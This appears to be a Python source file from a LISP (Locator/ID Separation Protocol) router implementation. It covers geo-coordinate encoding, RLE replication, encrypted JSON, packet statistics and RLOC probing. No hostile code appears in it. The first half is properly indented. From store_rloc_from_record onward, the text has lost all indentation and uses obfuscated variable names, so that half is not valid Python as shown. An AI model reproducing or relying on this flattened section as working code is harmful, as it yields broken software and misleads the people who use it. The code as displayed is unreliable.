        degrees, mins, secs = self.latitude, self.lat_mins, self.lat_secs
        dec = float(abs(degrees))
        dec += float(mins * 60 + secs) / 3600
        if (degrees > 0): dec = -dec
        latitude = dec

        degrees, mins, secs = self.longitude, self.long_mins, self.long_secs
        dec = float(abs(degrees))
        dec += float(mins * 60 + secs) / 3600
        if (degrees > 0): dec = -dec
        longitude = dec
        return((latitude, longitude))

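#
# Worked example (illustrative): 37 degrees 23 minutes 30 seconds
# converts to 37 + (23*60 + 30)/3600 = 37.39166..., and the sign flip
# above means a latitude stored negative (North, per parse_geo_string())
# yields a positive decimal degree, matching the usual convention.
#
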
    def get_distance(self, geo_point):
        dms1 = self.dms_to_decimal()
        dms2 = geo_point.dms_to_decimal()
        distance = vincenty(dms1, dms2)
        return(distance.km)

    def point_in_circle(self, geo_point):
        km = self.get_distance(geo_point)
        return(km <= self.radius)

    def encode_geo(self):
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_len = socket.htons(20 + 2)
        flags = 0

        lat = abs(self.latitude)
        lat_msecs = ((self.lat_mins * 60) + self.lat_secs) * 1000
        if (self.latitude < 0): flags |= 0x40

        lon = abs(self.longitude)
        lon_msecs = ((self.long_mins * 60) + self.long_secs) * 1000
        if (self.longitude < 0): flags |= 0x20

        alt = 0
        if (self.no_geo_altitude() == False):
            alt = socket.htonl(self.altitude)
            flags |= 0x10

        radius = socket.htons(self.radius)
        if (radius != 0): flags |= 0x06

        geo_packet = struct.pack("HBBBBH", lcaf_afi, 0, 0,
            LISP_LCAF_GEO_COORD_TYPE, 0, lcaf_len)
        geo_packet += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat,
            lat_msecs >> 16, socket.htons(lat_msecs & 0x0ffff), lon,
            lon_msecs >> 16, socket.htons(lon_msecs & 0xffff), alt, radius,
            0, 0)
        return(geo_packet)

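#
# Flag bits set by encode_geo() and mirrored by decode_geo() below:
# 0x40 = North (negative latitude), 0x20 = East (negative longitude),
# 0x10 = altitude present, 0x06 = radius present in kilometers;
# decode_geo() multiplies the radius by 1000 when bit 0x02 is clear.
#
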
    def decode_geo(self, packet, lcaf_len, radius_hi):
        packet_format = "BBHBBHBBHIHHH"
        format_size = struct.calcsize(packet_format)
        if (lcaf_len < format_size): return(None)

        flags, rsvd1, rsvd2, lat, lat_msecs_hi, lat_msecs_lo, lon, \
            lon_msecs_hi, lon_msecs_lo, alt, radius, rsvd3, afi = \
            struct.unpack(packet_format, packet[:format_size])

        #
        # A nested LCAF after the geo-coords is not supported.
        #
        afi = socket.ntohs(afi)
        if (afi == LISP_AFI_LCAF): return(None)

        if (flags & 0x40): lat = -lat
        self.latitude = lat
        lat_msecs = ((lat_msecs_hi << 16) | socket.ntohs(lat_msecs_lo)) / 1000
        self.lat_mins = lat_msecs / 60
        self.lat_secs = lat_msecs % 60

        if (flags & 0x20): lon = -lon
        self.longitude = lon
        lon_msecs = ((lon_msecs_hi << 16) | socket.ntohs(lon_msecs_lo)) / 1000
        self.long_mins = lon_msecs / 60
        self.long_secs = lon_msecs % 60

        self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
        radius = socket.ntohs(radius)
        self.radius = radius if (flags & 0x02) else radius * 1000

        self.geo_name = None
        packet = packet[format_size::]

        if (afi != 0):
            self.rloc.afi = afi
            packet = self.rloc.unpack_address(packet)
            self.rloc.mask_len = self.rloc.host_mask_len()
        return(packet)

class lisp_rle_node():
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.level = 0
        self.translated_port = 0
        self.rloc_name = None

    def copy_rle_node(self):
        rle_node = lisp_rle_node()
        rle_node.address.copy_address(self.address)
        rle_node.level = self.level
        rle_node.translated_port = self.translated_port
        rle_node.rloc_name = self.rloc_name
        return(rle_node)

    def store_translated_rloc(self, rloc, port):
        self.address.copy_address(rloc)
        self.translated_port = port

    def get_encap_keys(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.address.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            return(None, None)

class lisp_rle():
    def __init__(self, name):
        self.rle_name = name
        self.rle_nodes = []
        self.rle_forwarding_list = []

    def copy_rle(self):
        rle = lisp_rle(self.rle_name)
        for rle_node in self.rle_nodes:
            rle.rle_nodes.append(rle_node.copy_rle_node())
        rle.build_forwarding_list()
        return(rle)

    def print_rle(self, html, do_formatting):
        rle_str = ""
        for rle_node in self.rle_nodes:
            port = rle_node.translated_port

            rloc_name = ""
            if (rle_node.rloc_name != None):
                rloc_name = rle_node.rloc_name
                if (do_formatting): rloc_name = blue(rloc_name, html)
                rloc_name = "({})".format(rloc_name)

            addr_str = rle_node.address.print_address_no_iid()
            if (rle_node.address.is_local()): addr_str = red(addr_str, html)
            rle_str += "{}{}{}, ".format(addr_str,
                "" if port == 0 else ":" + str(port), rloc_name)

        return(rle_str[0:-2] if rle_str != "" else "")

    def build_forwarding_list(self):
        #
        # Find our own entry, then the first level greater than ours;
        # that is the level we replicate to.
        #
        level = -1
        for rle_node in self.rle_nodes:
            if (level == -1):
                if (rle_node.address.is_local()): level = rle_node.level
            else:
                if (rle_node.level > level): break

        level = 0 if level == -1 else rle_node.level

        self.rle_forwarding_list = []
        for rle_node in self.rle_nodes:
            if (rle_node.level == level or (level == 0 and
                rle_node.level == 128)):
                if (lisp_i_am_rtr == False and rle_node.address.is_local()):
                    addr_str = rle_node.address.print_address_no_iid()
                    lprint("Exclude local RLE RLOC {}".format(addr_str))
                    continue

                self.rle_forwarding_list.append(rle_node)

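#
# Illustrative walk-through of build_forwarding_list(): RLE nodes carry
# replication levels, and replication targets the next level after our
# own entry. A list like [A/0 (local), B/128, C/128] yields a forwarding
# list of B and C; a node that appears nowhere in the list replicates at
# level 0 (which the condition above treats as also matching level 128).
#
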
class lisp_json():
    def __init__(self, name, string, encrypted=False, ms_encrypt=False):
        self.json_name = name
        self.json_string = string
        self.json_encrypted = False

        #
        # A map-server configured with json-keys encrypts the JSON string
        # before storing it. Decryption happens on a lig client when the
        # LISP_JSON_KEY environment variable supplies "[<key-id>]<key>".
        #
        if (len(lisp_ms_json_keys) != 0):
            if (ms_encrypt == False): return
            self.json_key_id = lisp_ms_json_keys.keys()[0]
            self.json_key = lisp_ms_json_keys[self.json_key_id]
            self.encrypt_json()

        if (lisp_log_id == "lig" and encrypted):
            env_key = os.getenv("LISP_JSON_KEY")
            if (env_key != None):
                index = -1
                if (env_key[0] == "[" and "]" in env_key):
                    index = env_key.find("]")
                    self.json_key_id = int(env_key[1:index])

                self.json_key = env_key[index+1::]
                self.decrypt_json()

    def add(self):
        self.delete()
        lisp_json_list[self.json_name] = self

    def delete(self):
        if (lisp_json_list.has_key(self.json_name)):
            del(lisp_json_list[self.json_name])
            lisp_json_list[self.json_name] = None

    def print_json(self, html):
        good_string = self.json_string
        bad = "***"
        if (html): bad = red(bad, html)
        bad_string = bad + self.json_string + bad
        if (self.valid_json()): return(good_string)
        return(bad_string)

    def valid_json(self):
        try:
            json.loads(self.json_string)
        except:
            return(False)
        return(True)

    def encrypt_json(self):
        key = self.json_key.zfill(32)
        iv = "0" * 8

        json_dict = json.loads(self.json_string)
        for k in json_dict:
            value = json_dict[k]
            value = chacha.ChaCha(key, iv).encrypt(value)
            json_dict[k] = binascii.hexlify(value)

        self.json_string = json.dumps(json_dict)
        self.json_encrypted = True

    def decrypt_json(self):
        key = self.json_key.zfill(32)
        iv = "0" * 8

        json_dict = json.loads(self.json_string)
        for k in json_dict:
            value = binascii.unhexlify(json_dict[k])
            json_dict[k] = chacha.ChaCha(key, iv).encrypt(value)

        try:
            self.json_string = json.dumps(json_dict)
            self.json_encrypted = False
        except:
            pass

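#
# ChaCha is a stream cipher, so encrypting and decrypting are the same
# keystream XOR; decrypt_json() therefore calls .encrypt() on the
# unhexlified values with the same zero-filled key and "0"*8 nonce, using
# a fresh cipher instance per value. Round-trip sketch (hypothetical key):
#
#   >>> hexed = binascii.hexlify(
#   ...     chacha.ChaCha("my-key".zfill(32), "0" * 8).encrypt("secret"))
#   >>> chacha.ChaCha("my-key".zfill(32), "0" * 8).encrypt(
#   ...     binascii.unhexlify(hexed))
#   'secret'
#
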
class lisp_stats():
    def __init__(self):
        self.packet_count = 0
        self.byte_count = 0
        self.last_rate_check = 0
        self.last_packet_count = 0
        self.last_byte_count = 0
        self.last_increment = None

    def increment(self, octets):
        self.packet_count += 1
        self.byte_count += octets
        self.last_increment = lisp_get_timestamp()

    def recent_packet_sec(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 1)

    def recent_packet_min(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 60)

    def stat_colors(self, c1, c2, html):
        if (self.recent_packet_sec()):
            return(green_last_sec(c1), green_last_sec(c2))
        if (self.recent_packet_min()):
            return(green_last_min(c1), green_last_min(c2))
        return(c1, c2)

    #
    # Render a counter with an M/B/T suffix for millions, billions, and
    # trillions.
    #
    def normalize(self, count):
        count = str(count)
        digits = len(count)
        if (digits > 12):
            count = count[0:-10] + "." + count[-10:-7] + "T"
            return(count)
        if (digits > 9):
            count = count[0:-9] + "." + count[-9:-7] + "B"
            return(count)
        if (digits > 6):
            count = count[0:-6] + "." + count[-6] + "M"
            return(count)
        return(count)

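#
# Worked examples for normalize() (illustrative): 1234567 has 7 digits,
# so it prints as "1.2M"; 9876543210 has 10 digits and prints as "9.87B".
#
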
    def get_stats(self, summary, html):
        last_rate = self.last_rate_check
        last_packets = self.last_packet_count
        last_bytes = self.last_byte_count
        self.last_rate_check = lisp_get_timestamp()
        self.last_packet_count = self.packet_count
        self.last_byte_count = self.byte_count

        rate_diff = self.last_rate_check - last_rate
        if (rate_diff == 0):
            packet_rate = 0
            bit_rate = 0
        else:
            packet_rate = int((self.packet_count - last_packets) / rate_diff)
            bit_rate = (self.byte_count - last_bytes) / rate_diff
            bit_rate = (bit_rate * 8) / 1000000
            bit_rate = round(bit_rate, 2)

        #
        # Normalize counters into human-readable strings.
        #
        packet_str = self.normalize(self.packet_count)
        byte_str = self.normalize(self.byte_count)

        #
        # Either a one-line summary with the rates in a hover span, or the
        # full multi-field form.
        #
        if (summary):
            sep = "<br>" if html else ""
            packet_str, byte_str = self.stat_colors(packet_str, byte_str,
                html)
            title = "packet-count: {}{}byte-count: {}".format(packet_str,
                sep, byte_str)
            stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format(
                packet_rate, bit_rate)
            if (html != ""): stats = lisp_span(title, stats)
        else:
            prate = str(packet_rate)
            brate = str(bit_rate)
            if (html):
                packet_str = lisp_print_cour(packet_str)
                prate = lisp_print_cour(prate)
                byte_str = lisp_print_cour(byte_str)
                brate = lisp_print_cour(brate)

            sep = "<br>" if html else ", "

            stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
                "{}{}bit-rate: {} mbps").format(packet_str, sep, prate, sep,
                byte_str, sep, brate)
        return(stats)

lisp_decap_stats = {
    "good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
    "checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
    "no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
    "outer-header-error" : lisp_stats()
}

class lisp_rloc():
    def __init__(self, recurse=True):
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_name = None
        self.interface = None
        self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.translated_port = 0
        self.priority = 255
        self.weight = 0
        self.mpriority = 255
        self.mweight = 0
        self.uptime = 0
        self.state = LISP_RLOC_UP_STATE
        self.last_state_change = None
        self.rle_name = None
        self.elp_name = None
        self.geo_name = None
        self.json_name = None
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.stats = lisp_stats()
        self.last_rloc_probe = None
        self.last_rloc_probe_reply = None
        self.rloc_probe_rtt = -1
        self.recent_rloc_probe_rtts = [-1, -1, -1]
        self.rloc_probe_hops = "?/?"
        self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
        self.rloc_probe_latency = "?/?"
        self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
        self.last_rloc_probe_nonce = 0
        self.echo_nonce_capable = False
        self.map_notify_requested = False
        self.rloc_next_hop = None
        self.next_rloc = None
        self.multicast_rloc_probe_list = {}

        if (recurse == False): return

        #
        # When there are multiple default routes, chain a copy of this
        # RLOC off each next-hop so every path can be RLOC-probed.
        #
        next_hops = lisp_get_default_route_next_hops()
        if (next_hops == [] or len(next_hops) == 1): return

        self.rloc_next_hop = next_hops[0]
        last_rloc = self
        for nh in next_hops[1::]:
            next_rloc = lisp_rloc(False)
            next_rloc = copy.deepcopy(self)
            next_rloc.rloc_next_hop = nh
            last_rloc.next_rloc = next_rloc
            last_rloc = next_rloc

    def up_state(self):
        return(self.state == LISP_RLOC_UP_STATE)

    def unreach_state(self):
        return(self.state == LISP_RLOC_UNREACH_STATE)

    def no_echoed_nonce_state(self):
        return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)

    def down_state(self):
        return(self.state in [LISP_RLOC_DOWN_STATE,
            LISP_RLOC_ADMIN_DOWN_STATE])

    def print_state(self):
        if (self.state is LISP_RLOC_UNKNOWN_STATE):
            return("unknown-state")
        if (self.state is LISP_RLOC_UP_STATE):
            return("up-state")
        if (self.state is LISP_RLOC_DOWN_STATE):
            return("down-state")
        if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
            return("admin-down-state")
        if (self.state is LISP_RLOC_UNREACH_STATE):
            return("unreach-state")
        if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
            return("no-echoed-nonce-state")
        return("invalid-state")

    def print_rloc(self, indent):
        uptime = lisp_print_elapsed(self.uptime)
        lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
            red(self.rloc.print_address(), False), uptime,
            self.print_state(), self.priority, self.weight, self.mpriority,
            self.mweight))

    def print_rloc_name(self, cour=False):
        if (self.rloc_name == None): return("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return('rloc-name: {}'.format(blue(rloc_name, cour)))

def store_rloc_from_record ( self , rloc_record , nonce , source ) :
Oo0o = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
I1II = self . rloc
if ( I1II . is_null ( ) == False ) :
IIIii = lisp_get_nat_info ( I1II , self . rloc_name )
if ( IIIii ) :
Oo0o = IIIii . port
o0Oooo = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
oo0o00OO = I1II . print_address_no_iid ( )
O0ooo0Ooo = red ( oo0o00OO , False )
I1111I1ii1I1 = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if ( IIIii . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( O0ooo0Ooo , Oo0o , I1111I1ii1I1 ) )
IIIii = None if ( IIIii == o0Oooo ) else o0Oooo
if ( IIIii and IIIii . timed_out ( ) ) :
Oo0o = IIIii . port
O0ooo0Ooo = red ( IIIii . address , False )
lprint ( ( " Youngest stored NAT state timed out " + "for RLOC {}:{}, {}" ) . format ( O0ooo0Ooo , Oo0o , I1111I1ii1I1 ) )
IIIii = None
if ( IIIii ) :
if ( IIIii . address != oo0o00OO ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( O0ooo0Ooo , red ( IIIii . address , False ) ) )
self . rloc . store_address ( IIIii . address )
O0ooo0Ooo = red ( IIIii . address , False )
Oo0o = IIIii . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( O0ooo0Ooo , Oo0o , I1111I1ii1I1 ) )
self . store_translated_rloc ( I1II , Oo0o )
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
self . rle = rloc_record . rle
if ( self . rle ) :
for IiioOoo in self . rle . rle_nodes :
IIiiI11iI = IiioOoo . rloc_name
IIIii = lisp_get_nat_info ( IiioOoo . address , IIiiI11iI )
if ( IIIii == None ) : continue
Oo0o = IIIii . port
Ooooo = IIiiI11iI
if ( Ooooo ) : Ooooo = blue ( IIiiI11iI , False )
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( Oo0o , IiioOoo . address . print_address_no_iid ( ) , Ooooo ) )
IiioOoo . translated_port = Oo0o
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
oO00oo = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if ( rloc_record . keys != None and oO00oo ) :
o0Oo = rloc_record . keys [ 1 ]
if ( o0Oo != None ) :
oo0o00OO = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( Oo0o )
o0Oo . add_key_by_rloc ( oo0o00OO , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( oo0o00OO , False ) ) )
return ( Oo0o )
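#
# Record a NAT-translated RLOC address and its translated encap-port for
# this entry.
#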
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
return ( True )
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
def print_state_change ( self , new_state ) :
III1I111i = self . print_state ( )
O0ooo = "{} -> {}" . format ( III1I111i , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
O0ooo = bold ( O0ooo , False )
return ( O0ooo )
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
def print_recent_rloc_probe_rtts ( self ) :
i1I1I1i = str ( self . recent_rloc_probe_rtts )
i1I1I1i = i1I1I1i . replace ( "-1" , "?" )
return ( i1I1I1i )
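#
# Compute the RLOC-probe RTT as last-reply time minus last-request time,
# rounded to 3 decimal places, shifting the previous value into the
# recent-RTT history array.
#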
def compute_rloc_probe_rtt ( self ) :
IiI1i11iiII = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
o0O00OoooOo = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ IiI1i11iiII ] + o0O00OoooOo [ 0 : - 1 ]
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
def print_recent_rloc_probe_hops ( self ) :
i1I1II1 = str ( self . recent_rloc_probe_hops )
return ( i1I1II1 )
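#
# Store to/from hop counts derived from the probe TTLs: "?" means unknown
# and "!" flags a received TTL below half the initial probe TTL
# (presumably an unexpectedly long path). The previous value is shifted
# into the recent-hops history.
#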
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < LISP_RLOC_PROBE_TTL / 2 ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if ( from_ttl < LISP_RLOC_PROBE_TTL / 2 ) :
II111IiI1I = "!"
else :
II111IiI1I = str ( LISP_RLOC_PROBE_TTL - from_ttl )
IiI1i11iiII = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + II111IiI1I
o0O00OoooOo = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ IiI1i11iiII ] + o0O00OoooOo [ 0 : - 1 ]
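#
# Compute one-way latencies from the JSON telemetry carried in a
# RLOC-probe reply: forward is etr-in minus itr-out, reverse is itr-in
# minus etr-out. The previous value is shifted into the latency history.
#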
def store_rloc_probe_latencies ( self , json_telemetry ) :
i11IIIi1I1I = lisp_decode_telemetry ( json_telemetry )
O0iiII1iiiI1II1 = round ( float ( i11IIIi1I1I [ "etr-in" ] ) - float ( i11IIIi1I1I [ "itr-out" ] ) , 3 )
i1111Iii = round ( float ( i11IIIi1I1I [ "itr-in" ] ) - float ( i11IIIi1I1I [ "etr-out" ] ) , 3 )
IiI1i11iiII = self . rloc_probe_latency
self . rloc_probe_latency = str ( O0iiII1iiiI1II1 ) + "/" + str ( i1111Iii )
o0O00OoooOo = self . recent_rloc_probe_latencies
self . recent_rloc_probe_latencies = [ IiI1i11iiII ] + o0O00OoooOo [ 0 : - 1 ]
def print_rloc_probe_latency ( self ) :
return ( self . rloc_probe_latency )
def print_recent_rloc_probe_latencies ( self ) :
iiIIiI = str ( self . recent_rloc_probe_latencies )
return ( iiIIiI )
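#
# Process a received RLOC-probe reply. Find the RLOC entry whose stored
# probe nonce matches, mark it up, record RTT/hops/latency, and when
# multiple next-hops exist, install a host route through the next-hop
# with the best measured RTT.
#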
def process_rloc_probe_reply ( self , ts , nonce , eid , group , hc , ttl , jt ) :
I1II = self
while ( True ) :
if ( I1II . last_rloc_probe_nonce == nonce ) : break
I1II = I1II . next_rloc
if ( I1II == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
return
I1II . last_rloc_probe_reply = ts
I1II . compute_rloc_probe_rtt ( )
Iiiii = I1II . print_state_change ( "up" )
if ( I1II . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( I1II . rloc , True )
I1II . state = LISP_RLOC_UP_STATE
I1II . last_state_change = lisp_get_timestamp ( )
o0oO0o00 = lisp_map_cache . lookup_cache ( eid , True )
if ( o0oO0o00 ) : lisp_write_ipc_map_cache ( True , o0oO0o00 )
I1II . store_rloc_probe_hops ( hc , ttl )
if ( jt ) : I1II . store_rloc_probe_latencies ( jt )
oO0oo000O = bold ( "RLOC-probe reply" , False )
oo0o00OO = I1II . rloc . print_address_no_iid ( )
I11iiI111iIi1I = bold ( str ( I1II . print_rloc_probe_rtt ( ) ) , False )
IiI1i1i1 = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
Oo00 = ""
if ( I1II . rloc_next_hop != None ) :
o0 , I1IIIIiI1i = I1II . rloc_next_hop
Oo00 = ", nh {}({})" . format ( I1IIIIiI1i , o0 )
III1iIi111I1 = bold ( I1II . print_rloc_probe_latency ( ) , False )
III1iIi111I1 = ", latency {}" . format ( III1iIi111I1 ) if jt else ""
iIIi1iI1I1IIi = green ( lisp_print_eid_tuple ( eid , group ) , False )
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}{}" ) . format ( oO0oo000O , red ( oo0o00OO , False ) , IiI1i1i1 , iIIi1iI1I1IIi , Iiiii , I11iiI111iIi1I , Oo00 , str ( hc ) + "/" + str ( ttl ) , III1iIi111I1 ) )
if ( I1II . rloc_next_hop == None ) : return
I1II = None
O00oo0 = None
while ( True ) :
I1II = self if I1II == None else I1II . next_rloc
if ( I1II == None ) : break
if ( I1II . up_state ( ) == False ) : continue
if ( I1II . rloc_probe_rtt == - 1 ) : continue
if ( O00oo0 == None ) : O00oo0 = I1II
if ( I1II . rloc_probe_rtt < O00oo0 . rloc_probe_rtt ) : O00oo0 = I1II
if ( O00oo0 != None ) :
o0 , I1IIIIiI1i = O00oo0 . rloc_next_hop
Oo00 = bold ( "nh {}({})" . format ( I1IIIIiI1i , o0 ) , False )
lprint ( " Install host-route via best {}" . format ( Oo00 ) )
lisp_install_host_route ( oo0o00OO , None , False )
lisp_install_host_route ( oo0o00OO , I1IIIIiI1i , True )
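#
# Add this RLOC, keyed by address (plus port when NAT-translated), to the
# global RLOC-probe list for the given EID/group. If the address is
# already being probed and is unreachable, inherit the unreachable state.
#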
def add_to_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
Oo0o = self . translated_port
if ( Oo0o != 0 ) : oo0o00OO += ":" + str ( Oo0o )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) :
lisp_rloc_probe_list [ oo0o00OO ] = [ ]
if ( group . is_null ( ) ) : group . instance_id = 0
for I1I111iIiI , iIIi1iI1I1IIi , i11ii in lisp_rloc_probe_list [ oo0o00OO ] :
if ( iIIi1iI1I1IIi . is_exact_match ( eid ) and i11ii . is_exact_match ( group ) ) :
if ( I1I111iIiI == self ) :
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
return
lisp_rloc_probe_list [ oo0o00OO ] . remove ( [ I1I111iIiI , iIIi1iI1I1IIi , i11ii ] )
break
lisp_rloc_probe_list [ oo0o00OO ] . append ( [ self , eid , group ] )
I1II = lisp_rloc_probe_list [ oo0o00OO ] [ 0 ] [ 0 ]
if ( I1II . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
def delete_from_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
Oo0o = self . translated_port
if ( Oo0o != 0 ) : oo0o00OO += ":" + str ( Oo0o )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) : return
oOoOOOo = [ ]
for i1ii1i1Ii11 in lisp_rloc_probe_list [ oo0o00OO ] :
if ( i1ii1i1Ii11 [ 0 ] != self ) : continue
if ( i1ii1i1Ii11 [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( i1ii1i1Ii11 [ 2 ] . is_exact_match ( group ) == False ) : continue
oOoOOOo = i1ii1i1Ii11
break
if ( oOoOOOo == [ ] ) : return
try :
lisp_rloc_probe_list [ oo0o00OO ] . remove ( oOoOOOo )
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
except :
return
def print_rloc_probe_state ( self , trailing_linefeed ) :
oOOO = ""
I1II = self
while ( True ) :
OOOOO0 = I1II . last_rloc_probe
if ( OOOOO0 == None ) : OOOOO0 = 0
o0OOOO = I1II . last_rloc_probe_reply
if ( o0OOOO == None ) : o0OOOO = 0
I11iiI111iIi1I = I1II . print_rloc_probe_rtt ( )
OO0o0OO0 = space ( 4 )
if ( I1II . rloc_next_hop == None ) :
oOOO += "RLOC-Probing:\n"
else :
o0 , I1IIIIiI1i = I1II . rloc_next_hop
oOOO += "RLOC-Probing for nh {}({}):\n" . format ( I1IIIIiI1i , o0 )
oOOO += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( OO0o0OO0 , lisp_print_elapsed ( OOOOO0 ) , OO0o0OO0 , lisp_print_elapsed ( o0OOOO ) , I11iiI111iIi1I )
if ( trailing_linefeed ) : oOOO += "\n"
I1II = I1II . next_rloc
if ( I1II == None ) : break
oOOO += "\n"
return ( oOOO )
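#
# Return the (encrypt-key, icv-key) pair stored for this RLOC's
# "address:port" encap crypto state, or (None, None) when none exists.
#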
def get_encap_keys ( self ) :
Oo0o = "4341" if self . translated_port == 0 else str ( self . translated_port )
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + Oo0o
try :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) : return ( iIi11III [ 1 ] . encrypt_key , iIi11III [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
def rloc_recent_rekey ( self ) :
Oo0o = "4341" if self . translated_port == 0 else str ( self . translated_port )
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + Oo0o
try :
o0Oo = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ] [ 1 ]
if ( o0Oo == None ) : return ( False )
if ( o0Oo . last_rekey == None ) : return ( True )
return ( time . time ( ) - o0Oo . last_rekey < 1 )
except :
return ( False )
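#
# lisp_mapping
#
# A map-cache entry: an EID (or (S,G) pair) with its RLOC-set and the
# bookkeeping used for TTL-based refresh and packet statistics.
#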
class lisp_mapping ( ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . register_ttl = LISP_REGISTER_TTL
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
self . recent_sources = { }
self . last_multicast_map_request = 0
def print_mapping ( self , eid_indent , rloc_indent ) :
i1 = lisp_print_elapsed ( self . uptime )
OOo0oOOO0 = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , OOo0oOOO0 , i1 ,
len ( self . rloc_set ) ) )
for I1II in self . rloc_set : I1II . print_rloc ( rloc_indent )
def print_eid_tuple ( self ) :
